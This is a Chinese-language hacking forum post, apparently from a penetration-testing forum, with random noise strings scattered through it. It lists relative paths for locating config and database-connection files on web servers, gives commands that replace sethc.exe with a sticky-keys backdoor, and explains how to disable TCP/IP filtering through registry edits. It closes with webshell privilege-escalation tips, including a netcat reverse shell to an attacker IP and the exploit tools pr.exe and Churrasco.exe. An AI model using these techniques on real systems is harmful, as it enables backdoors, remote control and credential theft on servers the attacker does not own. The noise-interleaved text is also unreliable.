) j) z& g: k; B* @( r( g4 WC:\Program Files\FlashFXP\flashfxp.exe
c:\Program Files\Oracle\bin\regsvr32.exe
c:\Program Files\腾讯游戏\QQGAME\readme.txt
c:\Program Files\tencent\腾讯游戏\QQGAME\readme.txt
c:\Program Files\tencent\QQGAME\readme.txt
$ ?1 A. F% }% n; C5 X  {4 ^. RC:\Program Files\StormII\Storm.exe

3.网站相对路径:
. u! e1 N* j$ u+ n
/config.php
../../config.php
0 Y* y/ s8 s) |+ y# v../config.php
7 I& \4 o4 c2 d1 A& Z../../../config.php
/config.inc.php
3 b- C0 p, D! H: w4 T4 y: D# M./config.inc.php
../../config.inc.php
../config.inc.php
- P$ \( A/ B: `6 u. o2 Y& E3 K../../../config.inc.php
- O& u, ^7 Z3 z; d( R. V0 E/conn.php
, }: b8 }( w+ ?7 |) X5 K/ Q./conn.php
! A; v1 \* c. I0 w4 `1 g5 u$ e  B8 x../../conn.php
../conn.php
( x% p3 P. P6 [/ r! }1 Y! a../../../conn.php
) G0 P4 Y! R* x, z6 w- d9 x0 q/conn.asp
./conn.asp
5 }& f( ~. b1 J8 I6 R6 e* b../../conn.asp
../conn.asp
" U4 b# J/ q& d9 V../../../conn.asp
/config.inc.php
./config.inc.php
; i; d& {4 @  C( s& d../../config.inc.php
8 x- T! |' A1 x; x5 `0 G6 u$ k( g, K../config.inc.php
../../../config.inc.php
/config/config.php
../../config/config.php
, q/ M' d* k, l" [7 b# a: \../config/config.php
../../../config/config.php
/config/config.inc.php
! X/ W  f! ~# k, q2 O' |1 J./config/config.inc.php
+ d/ p: }& P7 |5 T0 L8 D6 N../../config/config.inc.php
! q( M' d6 `5 i) W5 a8 r../config/config.inc.php
) T" g: d, o& R/ P../../../config/config.inc.php
9 K% H1 u' K; J2 H$ ]& t7 S/config/conn.php
* E  w: v4 S% B6 \  G( P5 `) w./config/conn.php
../../config/conn.php
: l1 B1 @; @! R# t1 [2 d../config/conn.php
../../../config/conn.php
( n: Y; P( ^( g& n0 [/config/conn.asp
./config/conn.asp
. ^: D% x4 P3 f8 H. h8 o, j- J../../config/conn.asp
& m3 [& F5 M0 H( F/ j../config/conn.asp
../../../config/conn.asp
/config/config.inc.php
9 i' L, m; ~4 K2 Z' E- R8 H./config/config.inc.php
../../config/config.inc.php
( _! b  l, }$ z; {../config/config.inc.php
../../../config/config.inc.php
" C9 K- T& g% x1 u7 W9 Y# `/data/config.php
../../data/config.php
% n9 Z7 i! o5 m% U5 ^7 O3 q5 s../data/config.php
../../../data/config.php
; j3 f0 u5 u* m( R/data/config.inc.php
; e' C9 S( V9 n& ?1 z./data/config.inc.php
  k4 ]: i5 \: G7 V1 f6 ^../../data/config.inc.php
% J/ p+ ?/ z, Y/ C../data/config.inc.php
* V% X7 Q. w: n. g  y7 v( F4 O../../../data/config.inc.php
0 D1 E- e: G1 V) d/data/conn.php
./data/conn.php
../../data/conn.php
../data/conn.php
9 e* Y$ ~/ a' ]) b../../../data/conn.php
/data/conn.asp
% F- \! p! h5 c9 p, L( i; g./data/conn.asp
$ m2 X/ L, o, [../../data/conn.asp
# f7 z4 _% w% `5 L2 _../data/conn.asp
../../../data/conn.asp
: g0 J0 m7 }+ n' |" @/data/config.inc.php
./data/config.inc.php
../../data/config.inc.php
" l  t3 t$ o0 m, I) {../data/config.inc.php
. K( g3 `2 r+ }- O* N' S* ^  O../../../data/config.inc.php
& b" M: l# N" F' m  V/include/config.php
( x$ [" b9 ]. m( T../../include/config.php
../include/config.php
0 T+ [$ v; t4 g+ ?../../../include/config.php
/include/config.inc.php
./include/config.inc.php
) T. ], m* I; e) o../../include/config.inc.php
: `! s) n4 J/ \: A1 F* _../include/config.inc.php
../../../include/config.inc.php
/include/conn.php
0 F/ Q# q  z: F9 n8 d; E+ ~./include/conn.php
9 K" f' K5 L) }4 Q../../include/conn.php
../include/conn.php
4 g! Q3 I% Y3 A$ r& R../../../include/conn.php
/include/conn.asp
./include/conn.asp
& [# L9 i3 g. B% L../../include/conn.asp
../include/conn.asp
../../../include/conn.asp
9 Z  L  W# G/ Z7 z/include/config.inc.php
./include/config.inc.php
../../include/config.inc.php
! w$ o$ |! p% o4 _8 l. C+ L../include/config.inc.php
../../../include/config.inc.php
/inc/config.php
' M- U( `7 ?* t- |../../inc/config.php
/ \  `1 _4 e- \4 |../inc/config.php
../../../inc/config.php
/inc/config.inc.php
; @- c' m- Z. Y./inc/config.inc.php
" Z' A- i: o4 o3 B1 d$ H% J- c( j../../inc/config.inc.php
+ |$ h5 x1 M. V../inc/config.inc.php
6 P1 y% b' g5 Z4 a2 b4 f5 u( D7 V9 B../../../inc/config.inc.php
/inc/conn.php
./inc/conn.php
../../inc/conn.php
5 A( I7 \& B7 ^) b1 L../inc/conn.php
../../../inc/conn.php
/inc/conn.asp
./inc/conn.asp
% _) b2 a# |# }../../inc/conn.asp
% q5 e4 F. t; Q5 l! M../inc/conn.asp
../../../inc/conn.asp
/inc/config.inc.php
./inc/config.inc.php
, u  Y/ x* `4 p2 F1 n& Z0 }../../inc/config.inc.php
; R, N9 ~2 W( {4 F../inc/config.inc.php
../../../inc/config.inc.php
& d" ~" Z4 I7 Z9 u  _7 x  P+ B/index.php
4 s; `5 s$ ^8 n3 [./index.php
../../index.php
../index.php
5 P7 F" [, ^" g../../../index.php
/index.asp
./index.asp
../../index.asp
../index.asp
../../../index.asp
* ^- X3 d) i2 O# L替换SHIFT后门
5 l. w/ _4 U# w5 h) R0 H　attrib c:\windows\system32\sethc.exe -h -r -s

　　attrib c:\windows\system32\dllcache\sethc.exe -h -r -s

. w3 ~- u  I- n. u; Z　　del c:\windows\system32\sethc.exe
; Q4 S2 _! L. {7 b6 Q) t
　　copy c:\windows\explorer.exe c:\windows\system32\sethc.exe

6 \+ K' `7 k; s5 `　　copy c:\windows\system32\sethc.exe c:\windows\system32\dllcache\sethc.exe

3 r- }' h# z3 B% D* j* n- ]　　attrib c:\windows\system32\sethc.exe +h +r +s
7 T; j& H* J/ _: h" D9 C: S
　　attrib c:\windows\system32\dllcache\sethc.exe +h +r +s
0 {& z. G9 x& Y2 S2 n& X! h, \3 O去除TCPIP筛选
; M2 Z$ Y% E4 V1 l, nTCP/IP筛选在注册表里有三处，分别是：
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip
4 a* ~4 _0 G( }7 M" F% sHKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
0 \. d. o( r, h. ]5 n" e! a3 [
5 S* W. ~$ n4 v- i; E! L分别用
regedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
regedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
$ g) m% s0 F+ Vregedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
' X* x3 {7 {- A2 b& w命令来导出注册表项
& w: ^7 L$ m& h0 R# }
然后把 三个文件里的EnableSecurityFilters"=dword:00000001，改成EnableSecurityFilters"=dword:00000000
6 s, Y/ X7 ?/ a- U0 M3 {1 x
, t% L! a4 }! m再将以上三个文件分别用
# ?* {1 O4 a* v1 V/ `& ^regedit -s D:\a.reg
regedit -s D:\b.reg
regedit -s D:\c.reg
- t% ]0 q, {* V导入注册表即可

webshell提权小技巧
7 W' g% Z$ o! ~7 H3 }3 `: Y. Y# K, scmd路径:
% ~/ z: v1 w. ^2 e& d+ X) Dc:\windows\temp\cmd.exe
! ~" p3 z! Y2 Y% g3 B$ _, xnc也在同目录下
例如反弹cmdshell：
"c:\windows\temp\nc.exe -vv ip 999 -e c:\windows\temp\cmd.exe"
& C8 M' ^8 o4 N6 j; y/ D  z通常都不会成功。

8 E1 b8 j1 r4 m6 M, p( [$ E1 u3 |; G而直接在 cmd路径上 输入 c:\windows\temp\nc.exe
7 I2 G9 ~( A* I7 f7 c) m命令输入   -vv ip 999 -e c:\windows\temp\cmd.exe
却能成功。。
这个不是重点
我们通常 执行 pr.exe 或 Churrasco.exe 时 有时候也需要 按照上面的 方法才能成功

---

欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)

Powered by Discuz! X3.2